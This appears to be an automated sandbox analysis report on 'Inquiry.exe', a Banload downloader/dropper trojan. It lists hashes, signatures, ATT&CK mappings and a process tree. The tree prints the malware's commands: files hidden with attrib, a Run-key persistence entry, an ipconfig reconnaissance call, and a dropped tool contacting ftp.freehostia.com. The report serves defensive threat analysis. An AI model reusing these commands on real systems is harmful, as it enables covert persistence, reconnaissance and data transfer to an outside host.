Overview

overview

10

Static

static

3

Inquiry.exe

windows7-x64

8

Inquiry.exe

windows10-2004-x64

Analysis

  • max time kernel
    10s
  • max time network
    24s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-05-2024 19:33

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Inquiry.exe

  • Size

    2.3MB

  • MD5

    7bf8e2064a035d6d6162a5c8f616812c

  • SHA1

    402d7116983dd6d79f3eeeb3c3f6ad116ffa5669

  • SHA256

    5a1232280d7c0f8298f4d1f33eeaac6ebe4deea654b14367e779a0a7e7ebce8f

  • SHA512

    96b235bfcc9651ed50cd7aba365a3bc819434b144ba3eb982a3920db45d5d5d7d53c31e205944f42af9129986b41b57ad128ea5e3d9cc66898a68aebe0805fc8

  • SSDEEP

    49152:Iggs8ABpNAcbBicST5ZlL9/5ga/sKvnP+BQzeEbUJJk8Lq1v2BvA78:IVs8AvNzsl12j20EJGqN2mI

Score
10/10
banloaddownloaderdropperevasionpersistencetrojan

Malware Config

Signatures

  • Banload

    Banload variants download malicious files, then install and execute the files.

    trojandropperdownloaderbanload
  • Sets file to hidden 1 TTPs 5 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 3 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Inquiry.exe
    "C:\Users\Admin\AppData\Local\Temp\Inquiry.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2976
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:752
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2988
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
          4⤵
          • Enumerates system info in registry
          PID:3900
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:4864
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1652
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:3152
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:4284
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1564
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:384
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2992
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
              Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
              6⤵
              • Executes dropped EXE
              PID:3364
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro3.bat"
              6⤵
              • Adds Run key to start application
              PID:5112
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              6⤵
              • Gathers network information
              PID:2768
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
              adbr01.exe -f "011.011"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2620
              • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
                adbr01.exe -f "011.011"
                7⤵
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Modifies registry class
                PID:588
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
              adbr02.exe -f "112.112"
              6⤵
                PID:4972
                • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
                  adbr02.exe -f "112.112"
                  7⤵
                    PID:636

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Hide Artifacts

      2
      T1564

      Hidden Files and Directories

      2
      T1564.001

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      3
      T1012

      System Information Discovery

      5
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
        Filesize

        135B

        MD5

        37e51be074f6e9fb889cc6d236eac067

        SHA1

        61a8e92c71668dd41b1d532d2466c0fe507c403a

        SHA256

        07ed3ee991e64cd2d495ad78876585d18a4cb831f89507b5a268ef47451132f4

        SHA512

        d414e9b57ba526da18eca43a008e8a292b0b6c27f5ca075e02f217d986dab9c56e490848b436ccffb72a4fef3e6a4fd1ae0efc6a8ff0cef76e43253e842b0613

        Download Submit
      • C:\ProgramData\TEMP\RAIDTest
        Filesize

        4B

        MD5

        4ce4d01ccc41c2e73643c40abe61aa58

        SHA1

        2dcb3b58de4e71a1febd32f789d5fb36de11cadd

        SHA256

        09813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced

        SHA512

        f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
        Filesize

        118B

        MD5

        c69fb6b170a6abfb965777713ff229c1

        SHA1

        d43a2aa2d68a7a18453ea197a679be7763af859c

        SHA256

        bd703a3de33ffa87e8df571b0365ef6cda20a45b20c8825c2edc2a7a227aeb19

        SHA512

        4a207ac8829e6ba22f4914575c9ce3c0fe7792cd0720bab9717d04008b72c84fb6422ad3106f2f52fa4e3b21a5e697a347ec11558f2b18955e4312002bc8abfe

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
        Filesize

        124KB

        MD5

        1a1075e5e307f3a4b8527110a51ce827

        SHA1

        f453838ed21020b7ca059244feea8579e5aa74ef

        SHA256

        ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

        SHA512

        b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
        Filesize

        560B

        MD5

        481435bcf75055098596cd7eae7a04bd

        SHA1

        3089a8aebb1a199d886fddb1a416903a1172d4b3

        SHA256

        261a0c0c76fb08f6b57aaad7fce12c485e00a5ecaac401dc10cb25d225bd8363

        SHA512

        a1174877296c771f13c726576650024bb63d845bb6b6654994cea387d9b4dddff09167e24e596e0d44424997ec422a456c9366ec998b5dcce5d1b5540ee5f7b8

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
        Filesize

        186B

        MD5

        09082253605a7171f078e26dc308a667

        SHA1

        585286c9fcda5e66e7fdb4e17a7bab6160183d46

        SHA256

        f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed

        SHA512

        adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
        Filesize

        189B

        MD5

        ce8041824149d8266dbb0ad9688224d7

        SHA1

        3ab653c43ce66681ceaab90193e1a4c95d998090

        SHA256

        0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5

        SHA512

        e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
        Filesize

        256KB

        MD5

        97b8dbcc7b3cc290aef4241df911ac2e

        SHA1

        733ababbcd278821d4e3ee78580841981f26642e

        SHA256

        c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023

        SHA512

        4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro3.bat
        Filesize

        140B

        MD5

        6f94e6edb06f44229e66f7a3d1ae0966

        SHA1

        997b74fa1beb2791f98177457636d9ce9b30ed4f

        SHA256

        4a4ba15d7a91c61de1cee9d00bd9db6f6d7e63e920dd2833878a46ea57b03f1b

        SHA512

        a2a3d2aa0176e76d46f8a79370ed588ab74b3fb4ca931a6f71e0c34f4561531d62f4da89284ac8cf42ce2e29b18dcc4f7c4d56625e93d2a6e64c082887c6350f

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
        Filesize

        2.1MB

        MD5

        31b2af509754d527a4c2a5cc1b2ad970

        SHA1

        cc737999c1dfeab2dcbe4178118281ff7757db2d

        SHA256

        8d464baad77e60770bacd2d33f7344d08a34a3b3c63a361f9e61f8fec7bef6e9

        SHA512

        a6f1d4daecc61efe555e51a56147a04dfd4dbe4be00a110d4a7cf5f1b3edd17ac5f063a3b3dd9708cde01b8dc04c1526b226186870317746f8899388b6961c8d

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
        Filesize

        2.1MB

        MD5

        b7884b9cd90c13f6b55c43404d893237

        SHA1

        ccf856935b6c9d248e39b0885c641b803b4c7f1f

        SHA256

        0fdc310a86ecb105cb056774c78f1699fedd764782bf45a011161544f4857ac8

        SHA512

        7dddf3d655a581d57c70c8954308ea1a0a536b04cb1902ea53bc021429b0d81ed36ded4c39c297a17cfd8f33095be581a00f71a23a67c625d0212851d11d1dc1

        Download Submit
      • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
        Filesize

        1KB

        MD5

        ccf4c9a64c1fbf3818b0ca8f0644de4f

        SHA1

        5ff1fd81f9170ed5d3a59487e11cc96560d579bc

        SHA256

        622015abe90dd6b324a4d7b1034165d47f93a5d0572263a9eb067b0e374ee278

        SHA512

        14b2e6877c215f771ecc38028ec94eb4bfe441093e527184be390e1f9829e2c943c80c86d6bd5f605bbbfc2f5cccaf908959a98184982c76dbc1ca4e946df6c0

        Download Submit
      • memory/588-74-0x0000000002A50000-0x0000000002C5C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/588-63-0x0000000002A50000-0x0000000002C5C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/588-72-0x0000000000400000-0x00000000006B4000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/588-73-0x0000000000400000-0x00000000006B4000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/588-59-0x0000000002A50000-0x0000000002C5C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/588-71-0x0000000000400000-0x00000000006B4000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/588-70-0x0000000000400000-0x00000000006B4000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/588-80-0x0000000002A50000-0x0000000002C5C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/588-85-0x0000000002A50000-0x0000000002C5C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/588-57-0x0000000000400000-0x00000000006B4000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/636-95-0x0000000000400000-0x00000000006B7000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/636-97-0x0000000002940000-0x0000000002B4C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/636-100-0x0000000002940000-0x0000000002B4C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/636-109-0x0000000000400000-0x00000000006B7000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/636-110-0x0000000000400000-0x00000000006B7000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/636-113-0x0000000002940000-0x0000000002B4C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/636-112-0x0000000000400000-0x00000000006B7000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/636-111-0x0000000000400000-0x00000000006B7000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/636-119-0x0000000002940000-0x0000000002B4C000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/2620-86-0x0000000000400000-0x00000000006B4000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/2620-55-0x0000000000400000-0x00000000006B4000-memory.dmp
        Filesize

        2.7MB

        Download
      • memory/4972-92-0x0000000000400000-0x00000000006B7000-memory.dmp
        Filesize

        2.7MB

        Download